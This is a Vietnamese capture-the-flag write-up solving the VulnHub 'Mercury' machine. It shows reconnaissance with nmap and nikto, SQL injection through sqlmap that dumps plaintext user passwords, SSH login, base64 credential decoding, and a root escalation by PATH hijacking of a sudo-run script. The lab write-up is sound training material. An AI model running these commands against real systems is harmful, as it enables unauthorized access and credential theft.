[VulnHub] Mercury

Overview

Link download: THE PLANETS: MERCURY
Difficulty: Easy

Đây là một machine trên Vulnhub, theo dạng boot2root, yêu cầu của bài là phải lấy được 2 flag trong user.txt và root.txt.
Okay, xem có gì ở đây nào.

Information Gathering

Nmap

Go! Xem cái của nợ này đang có địa chỉ IP là gì.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nmap 10.10.10.0/24                                       
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-26 21:16 +07
Nmap scan report for 10.10.10.1
Host is up (0.00022s latency).
All 1000 scanned ports on 10.10.10.1 are closed

Nmap scan report for 10.10.10.10
Host is up (0.00026s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy

Nmap done: 256 IP addresses (2 hosts up) scanned in 2.85 seconds

Tóm được machine đang có IP là 10.10.10.10, IP đẹp phết đấy ml =))
Tạm thời thấy 2 cổng đang được mở là 22-SSH và 8080-HTTP. Để chắc chắn hơn thì cứ quét lại với tham số -p- để kiểm tra tất cả các cổng.

1
2
3
4
5
6
7
8
9
10
$ nmap -p- 10.10.10.10                                      
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-26 21:20 +07
Nmap scan report for 10.10.10.10
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds

Chả có vẹo gì thay đổi, vẫn chỉ có 2 cổng này. Tốt thôi, giờ thì xem kỹ hơn 2 cổng này chạy dịch vụ gì, phiên bản bao nhiêu, vân vân mây mây… để đi tìm hướng tấn công.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
$ nmap -p 22,8080 -sV -sC 10.10.10.10                              
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-26 21:20 +07
Nmap scan report for 10.10.10.10
Host is up (0.00061s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
| 256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_ 256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Date: Sat, 26 Dec 2020 14:20:56 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html
| X-Frame-Options: DENY
| Content-Length: 2366
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta http-equiv="content-type" content="text/html; charset=utf-8">
| <title>Page not found at /nice ports,/Trinity.txt.bak</title>
| <meta name="robots" content="NONE,NOARCHIVE">
| <style type="text/css">
| html * { padding:0; margin:0; }
| body * { padding:10px 20px; }
| body * * { padding:0; }
| body { font:small sans-serif; background:#eee; color:#000; }
| body>div { border-bottom:1px solid #ddd; }
| font-weight:normal; margin-bottom:.4em; }
| span { font-size:60%; color:#666; font-weight:normal; }
| table { border:none; border-collapse: collapse; width:100%; }
| vertical-align:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sat, 26 Dec 2020 14:20:56 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html; charset=utf-8
| X-Frame-Options: DENY
| Content-Length: 69
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| Hello. This site is currently in development please check back later.
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.24 seconds

Nhận được về một đống lằng tằng nhằng, và biết thêm được cổng dịch vụ 22-SSH đang chạy là OpenSSH 8.2p1, cổng 8080 đang chạy http server WSGIServer/0.2 CPython/3.8.2.
Truy cập vào http://10.10.10.10:8080 để xem mặt mũi cái http server của nó ra sao, nhưng đéo có gì ngoài dòng chữ Hello. This site is currently in development please check back later.
Chả mới lạ cho lắm, mở xem mã nguồn trang (Ctrl U) cũng không nốt. Giờ thì phải tiếp tục công việc thu thập thông tin bằng cách liệt kê các thư mục/tập tin ẩn trên web server, quét với các công cụ khác để kiếm lỗi CVE,…

Nikto

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nikto -h http://10.10.10.10:8080                                
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.10
+ Target Hostname: 10.10.10.10
+ Target Port: 8080
+ Start Time: 2020-12-26 21:59:58 (GMT7)
---------------------------------------------------------------------------
+ Server: WSGIServer/0.2 CPython/3.8.2
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-17113: /SilverStream: SilverStream allows directory listing
+ Server banner has changed from 'WSGIServer/0.2 CPython/3.8.2' to 'WSGIServer/0.2 Python/3.8.2' which may suggest a WAF, load balancer or proxy is in place
+ 7852 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time: 2020-12-26 22:00:59 (GMT7) (61 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Khấm khá hơn đấy, tìm thấy thư mục /SilverStream, đếch cần biết nó nghĩa là gì, truy cập vào xem sao đã.

Ờ hớ, thư mục không tồn tại, trả về lỗi 404, nhưng do chế độ debug của web site được bật nên tôi thấy được một thư mục có tên là /mercuryfacts. Mặt mũi của nó như thế này.

Và khi nhấn vào để xem Mercury Fact thì nhận được vỏn vẹn dòng Fact id: 1. ((‘Mercury does not have any moons or rings.’,),). Ngắm nghía cái xem nào, cái này lấy fact theo id (url: http://10.10.10.10:8080/mercuryfacts/1/), vậy thì kiểm tra sql injection xem sao.

Á đù, vẫn là chế độ debug, và nó đem lại quá nhiều thông tin ngon bổ rẻ ở đây, tôi biết được url này có lỗi sql injection, biết được câu truy vấn, hệ quản trị là mysql, và cả lú thông tin cấu hình http server bên dưới nữa. Ok, ném cái url này vào sqlmap và lấy toàn bộ cơ sở dữ liệu ra xem.

Sqlmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ sqlmap --level=5 --risk=3 --threads=10 -u "http://10.10.10.10:8080/mercuryfacts/1*/" --dbms=mysql
...
[INFO] fetching database names
available databases [2]:
[*] information_schema
[*] mercury
...
[INFO] fetching tables for database: 'mercury'
Database: mercury
[2 tables]
+-------+
| facts |
| users |
+-------+
...
[INFO] fetching entries for table 'users' in database 'mercury'
Database: mercury
Table: users
[4 entries]
+----+-------------------------------+-----------+
| id | password | username |
+----+-------------------------------+-----------+
| 1 | johnny1987 | john |
| 2 | lovemykids111 | laura |
| 3 | lovemybeer111 | sam |
| 4 | mercuryisthesizeof0.056Earths | webmaster |
+----+-------------------------------+-----------+

Toẹt vời, mật khẩu lưu trong database nhưng không được mã hóa. Đoán là mấy cái tài khoản này được dùng để đăng nhập vào SSH, chứ cái web tò te này thì làm éo có trang login nào. Zô!
(Sau vài lần login sai, cuối cùng thì chỉ có mỗi cái tài khoản webmaster là dùng được thôi, còn lại là trap hết)

Get User Flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$ ssh [email protected]                                   
[email protected]'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun 27 Dec 11:16:51 UTC 2020

System load: 0.15 Processes: 101
Usage of /: 68.0% of 4.86GB Users logged in: 0
Memory usage: 57% IPv4 address for enp0s3: 10.10.10.10
Swap usage: 0%


22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$ id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)
webmaster@mercury:~$ ls -al
total 36
drwx------ 4 webmaster webmaster 4096 Sep 2 13:04 .
drwxr-xr-x 5 root root 4096 Aug 28 11:33 ..
lrwxrwxrwx 1 webmaster webmaster 9 Sep 1 10:01 .bash_history -> /dev/null
-rw-r--r-- 1 webmaster webmaster 220 Aug 27 13:13 .bash_logout
-rw-r--r-- 1 webmaster webmaster 3771 Aug 27 13:13 .bashrc
drwx------ 2 webmaster webmaster 4096 Aug 27 14:19 .cache
drwxrwxr-x 5 webmaster webmaster 4096 Aug 28 12:56 mercury_proj
-rw-r--r-- 1 webmaster webmaster 807 Aug 27 13:13 .profile
-rw-rw-r-- 1 webmaster webmaster 75 Sep 1 11:01 .selected_editor
-rw------- 1 webmaster webmaster 45 Sep 1 10:09 user_flag.txt
webmaster@mercury:~$ cat user_flag.txt
[user_flag_8339915c9a454657bd60ee58776f4ccd]

Flag đầu tiên, [user_flag_8339915c9a454657bd60ee58776f4ccd].

Privileges Escalation

Lần mò vào cái thư mục mercury_proj, đây là thư mục chứa script python để chạy web server, và có 1 file notes.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
webmaster@mercury:~/mercury_proj$ ls -al
total 28
drwxrwxr-x 5 webmaster webmaster 4096 Aug 28 12:56 .
drwx------ 4 webmaster webmaster 4096 Sep 2 13:04 ..
-rw-r--r-- 1 webmaster webmaster 0 Aug 27 13:56 db.sqlite3
-rwxr-xr-x 1 webmaster webmaster 668 Aug 27 14:06 manage.py
drwxrwxr-x 6 webmaster webmaster 4096 Sep 1 10:34 mercury_facts
drwxrwxr-x 4 webmaster webmaster 4096 Aug 28 12:47 mercury_index
drwxrwxr-x 3 webmaster webmaster 4096 Aug 28 10:36 mercury_proj
-rw------- 1 webmaster webmaster 196 Aug 28 12:56 notes.txt
webmaster@mercury:~/mercury_proj$ cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==

Mã hóa đỉnh cao đấy, dùng hẳn base64, nhưng may là tôi có tài crack thiên bẩm nên chỉ mất 1 giây là có thể lấy được mật khẩu bản rõ.

1
2
3
4
$ echo bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK | base64 -d
mercuryisthesizeof0.056Earths
$ echo bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg== | base64 -d
mercurymeandiameteris4880km

Tóm được thêm một chú nữa, linuxmaster/mercurymeandiameteris4880km, SSH sang cái tài khoản này xem nào.

1
2
3
4
5
6
7
8
9
10
11
12
13
linuxmaster@mercury:~$ sudo -l
[sudo] password for linuxmaster:
Sorry, try again.
[sudo] password for linuxmaster:
Matching Defaults entries for linuxmaster on mercury:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User linuxmaster may run the following commands on mercury:
(root : root) SETENV: /usr/bin/check_syslog.sh
linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog

Get Root Flag

User linuxmaster có thể chạy /usr/bin/check_syslog.sh với sudo, với quyền root. Nội dung bash script dùng tail để kiểm tra log hệ thống, có thể nghĩ sang cách theo thang đặc quyền sử dụng PATH variables.
Theo hướng này, đầu tiên là tạo một file có tên là tail, nội dung là /bin/bash, mục đích là khi chạy lệnh sudo /usr/bin/check_syslog.sh với PATH trỏ đến đường dẫn chứa file tail, hệ thống sẽ gọi tail từ PATH mà chúng ta cung cấp, khi đó file tail sẽ được thực thi với quyền root và khởi động shell, vậy là chúng ta sẽ có root shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
linuxmaster@mercury:~$ mkdir duma
linuxmaster@mercury:~$ cd duma
linuxmaster@mercury:~/duma$ echo "/bin/bash" > tail
linuxmaster@mercury:~/duma$ chmod +x tail
linuxmaster@mercury:~/duma$ ls -al
total 12
drwxrwxr-x 2 linuxmaster linuxmaster 4096 Dec 27 12:39 .
drwx------ 4 linuxmaster linuxmaster 4096 Dec 27 12:39 ..
-rwxrwxr-x 1 linuxmaster linuxmaster 10 Dec 27 12:39 tail
linuxmaster@mercury:~/duma$ export PATH=$(pwd):$PATH
linuxmaster@mercury:~/duma$ echo $PATH
/home/linuxmaster/duma:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
linuxmaster@mercury:~/duma$ sudo -E PATH=$PATH /usr/bin/check_syslog.sh
root@mercury:~/duma#
uid=0(root) gid=0(root) groups=0(root)

Yay! Vậy là tóm được root shell, giờ thì lấy flag là xong thôi.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@mercury:~# cd /root
root@mercury:/root# ls
root_flag.txt
root@mercury:/root# cat root_flag.txt
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@
@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Congratulations on completing Mercury!!!
If you have any feedback please contact me at [email protected]
[root_flag_69426d9fda579afbffd9c2d47ca31d90]

Tèn ten!
Kinh nghiệm bản thân mình rút ra được từ bài này, đó là đừng tìn vào Response status, như ở trên, khi mình dùng dirsearch, nó chả tìm được thư mục nào cả, lí do là vì nó kiểm tra Response status và mặc định sẽ bỏ qua những file/folder 404 (Not found). Vậy nên, hãy cứ nhập linh tinh vào cái url xem nó trả về cho mình cái gì, kể cả lỗi cũng được, nhỡ đâu lại vớ được debug thì sao =))

Good luck!

Further reading

Leo thao đặc quyền sử dụng PATH variables